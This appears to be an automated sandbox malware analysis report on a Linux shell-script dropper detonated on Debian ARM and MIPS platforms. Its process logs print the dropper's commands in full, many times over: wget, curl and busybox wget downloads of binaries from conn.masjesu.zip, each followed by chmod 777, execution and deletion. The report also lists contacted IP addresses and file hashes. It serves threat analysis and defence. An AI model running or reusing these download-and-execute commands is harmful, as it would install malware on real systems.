Malware Analysis Report

2025-05-06 04:15

Sample ID 241025-bgvp8szglm
Target 1fe6de8ea9975b311fc0e7781eb48271.bin
SHA256 d44ff432211daf9c1be45ff0a6c526870a8a142de999a752c9c35c569a8bd6c9
Tags
antivm discovery defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

d44ff432211daf9c1be45ff0a6c526870a8a142de999a752c9c35c569a8bd6c9

Threat Level: Shows suspicious behavior

The file 1fe6de8ea9975b311fc0e7781eb48271.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm discovery defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 01:07

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 01:07

Reported

2024-10-25 01:10

Platform

debian9-armhf-20240611-en

Max time kernel

148s

Max time network

9s

Command Line

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-25 01:07

Reported

2024-10-25 01:10

Platform

debian9-mipsbe-20240611-en

Max time kernel

151s

Max time network

155s

Command Line

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg N/A
N/A /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 N/A
N/A /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb N/A
N/A /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE N/A
N/A /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm N/A
N/A /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO N/A
N/A /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM N/A
N/A /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY N/A
N/A /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB N/A
N/A /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi N/A
N/A /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 N/A
N/A /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D N/A
N/A /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA N/A
N/A /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF N/A
N/A /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D N/A
N/A /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /usr/bin/curl N/A
File opened for modification /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /usr/bin/curl N/A
File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /usr/bin/curl N/A
File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /usr/bin/curl N/A
File opened for modification /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /usr/bin/curl N/A
File opened for modification /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /usr/bin/curl N/A
File opened for modification /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /usr/bin/curl N/A
File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /usr/bin/curl N/A
File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /usr/bin/curl N/A
File opened for modification /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /usr/bin/curl N/A
File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /usr/bin/curl N/A
File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /usr/bin/curl N/A
File opened for modification /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /usr/bin/curl N/A
File opened for modification /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /usr/bin/curl N/A
File opened for modification /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /usr/bin/curl N/A
File opened for modification /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /usr/bin/curl N/A
File opened for modification /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /usr/bin/curl N/A

Processes

/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/chmod

[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg

[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/rm

[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/chmod

[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23

[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/rm

[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/chmod

[chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb

[./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/rm

[rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/chmod

[chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE

[./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/rm

[rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/chmod

[chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm

[./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/rm

[rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/chmod

[chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO

[./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/rm

[rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/chmod

[chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM

[./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/rm

[rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/chmod

[chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY

[./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/rm

[rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/chmod

[chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB

[./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/rm

[rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/chmod

[chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi

[./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/rm

[rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/chmod

[chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8

[./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/rm

[rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/chmod

[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D

[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/rm

[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/chmod

[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA

[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/rm

[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/chmod

[chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF

[./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/rm

[rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/chmod

[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D

[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/rm

[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/chmod

[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA

[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/rm

[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp

Files

/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-25 01:07

Reported

2024-10-25 01:10

Platform

debian9-mipsel-20240611-en

Max time kernel

118s

Max time network

120s

Command Line

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
